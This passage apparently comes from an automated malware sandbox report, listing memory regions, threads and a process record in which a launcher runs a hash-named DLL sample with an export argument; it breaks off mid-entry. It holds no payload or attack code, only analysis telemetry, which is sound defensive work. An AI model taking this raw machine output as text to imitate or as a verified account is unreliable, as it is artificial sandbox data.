mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 6651 start_va = 0x580000 end_va = 0x580fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6652 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6653 start_va = 0x2870000 end_va = 0x294cfff monitored = 0 entry_point = 0x28ce0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 6654 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6721 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6722 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 6723 start_va = 0x7ffc4dfc0000 end_va = 0x7ffc4dffffff monitored = 0 entry_point = 0x7ffc4dfd6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 11902 start_va = 0x2870000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 11903 start_va = 0x28f0000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 11904 start_va = 0x2970000 end_va = 0x2a4cfff monitored = 0 entry_point = 0x29ce0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 13644 start_va = 0x2970000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 13645 start_va = 0x7ffc541c0000 end_va = 0x7ffc541cdfff monitored = 0 entry_point = 0x7ffc541c1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 15636 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 15637 start_va = 0x7ffc4dfc0000 end_va = 0x7ffc4dffffff monitored = 0 entry_point = 0x7ffc4dfd6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 16988 start_va = 0x7ffc541c0000 end_va = 0x7ffc541cdfff monitored = 0 entry_point = 0x7ffc541c1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Thread: id = 200 os_tid = 0x10c4 Thread: id = 201 os_tid = 0x10d0 Thread: id = 205 os_tid = 0x1110 Thread: id = 212 os_tid = 0xf3c Thread: id = 213 os_tid = 0x1350 Thread: id = 222 os_tid = 0xea0 Process: id = "27" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0xd3d5000" os_pid = "0x10e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6335 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6336 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6337 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6338 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 6339 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 6340 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6341 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6342 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6343 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 6344 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 6345 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6347 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6348 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6349 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6350 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6351 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 6352 start_va = 0x580000 end_va = 0x63dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6353 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6354 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6363 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 6364 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6365 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6366 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6367 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6368 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6369 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6370 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6371 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6372 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6373 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6374 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6375 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6376 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6377 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6378 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6379 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6413 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6414 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 6415 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6416 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 6417 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 6420 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 6421 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6422 start_va = 0x1e60000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 6423 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 6424 start_va = 0x1e60000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x1e80da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6425 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 6426 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 6430 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 6431 start_va = 0x1ff0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 6433 start_va = 0x21f0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 6434 start_va = 0x25f0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 6435 start_va = 0x2df0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 6720 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 6830 start_va = 0x3dc0000 end_va = 0x40f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7421 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 7422 start_va = 0x4100000 end_va = 0x4393fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 7943 start_va = 0x4100000 end_va = 0x424bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 8164 start_va = 0x4100000 end_va = 0x42bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 8522 start_va = 0x4100000 end_va = 0x5691fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 8880 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 8881 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 8882 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 8921 start_va = 0x4100000 end_va = 0x42cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 9063 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 9064 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9065 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9122 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9163 start_va = 0x4100000 end_va = 0x425bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 9388 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 9433 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9434 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9435 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9520 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9521 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9522 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9523 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9524 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9525 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9526 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9527 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9528 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9529 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9530 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9531 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9532 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9533 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9534 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9535 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9536 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9537 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9538 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9539 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9540 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9541 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9542 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9543 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9544 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9545 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9546 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9547 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9548 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9549 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9550 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9551 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9552 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9553 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9554 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9555 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9556 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9557 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9558 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9559 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9560 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9561 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 